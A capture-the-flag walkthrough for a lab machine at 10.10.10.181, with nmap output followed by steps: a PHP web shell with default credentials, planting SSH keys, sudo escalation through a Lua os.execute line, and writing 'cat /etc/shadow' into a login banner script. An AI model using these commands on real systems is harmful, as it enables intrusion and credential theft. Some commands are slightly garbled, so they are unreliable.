NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 12:03 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating NSE at 12:03
Completed NSE at 12:03, 0.00s elapsed
Initiating Ping Scan at 12:03
Scanning 10.10.10.181 [4 ports]
Completed Ping Scan at 12:03, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:03
Completed Parallel DNS resolution of 1 host. at 12:03, 0.57s elapsed
Initiating SYN Stealth Scan at 12:03
Scanning 10.10.10.181 [1000 ports]
Discovered open port 22/tcp on 10.10.10.181
Discovered open port 80/tcp on 10.10.10.181
Completed SYN Stealth Scan at 12:03, 3.45s elapsed (1000 total ports)
Initiating Service scan at 12:03
Scanning 2 services on 10.10.10.181
Completed Service scan at 12:03, 6.88s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.181
Retrying OS detection (try #2) against 10.10.10.181
Retrying OS detection (try #3) against 10.10.10.181
Retrying OS detection (try #4) against 10.10.10.181
Retrying OS detection (try #5) against 10.10.10.181
Initiating Traceroute at 12:03
Completed Traceroute at 12:03, 0.66s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:03
Completed Parallel DNS resolution of 2 hosts. at 12:03, 0.30s elapsed
NSE: Script scanning 10.10.10.181.
Initiating NSE at 12:03
Completed NSE at 12:04, 8.03s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 1.43s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Nmap scan report for 10.10.10.181
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/30%OT=22%CT=1%CU=38618%PV=Y%DS=2%DC=T%G=Y%TM=5ED1FE5
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 0.580 days (since Fri May 29 22:08:32 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 659.58 ms 10.10.14.1
2 659.59 ms 10.10.10.181
NSE: Script Post-scanning.
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.69 seconds
Raw packets sent: 1141 (54.230KB) | Rcvd: 1103 (47.658KB)
WEB ENUMERATION PORT 80
Lets First check Webpage !!
Lets check its source code
Here We see That we Have something written in comments So lets Google that !!
After Testing bunch of this I got one of them working Smevk.php lets redirect our url with this php file
credentials are default admin and admin we can read them in php file
After Logging in I got webpage like this!!
After looking at this page we can read and write files in actual machine So Lets use our own ssh keys and copy them to Webadmin as we cannot use Sysadmin
So after copying files in /home/webadmin/.ssh/authorized_keys we can SSH into webadmin.
SSH WEBADMIN THEN SYSADMIN
As we can see we have access to sysadmin
After trying to get into sysadmin I failed!!
Its time to priv escalate our user
sudo -l
After searching over google I saw that i can access sysadmin using simple commands <br>So I used simple command to check if it works
echo “os.execute(‘/bin/bash/’)” > privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
Here We got Sysadmin’s User access!!!
GETTING ROOT ACCESS
Lets run pspy32 to check running proccess
we got a process which is unique!!
Lets google this !!
After google Lets see file permissions and users
root and sysadmin
It is updated every 30 seconds
Lets execute our command in 00-header as we can see output of this file in ssh login time as it is same as ssh login..
echo “cat /etc/shadow” > 00-header1
We have to login to webadmin SSH again in another terminal
Here we got our output!!
echo “cat /root/root.txt
Here we Go with our root flag!!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
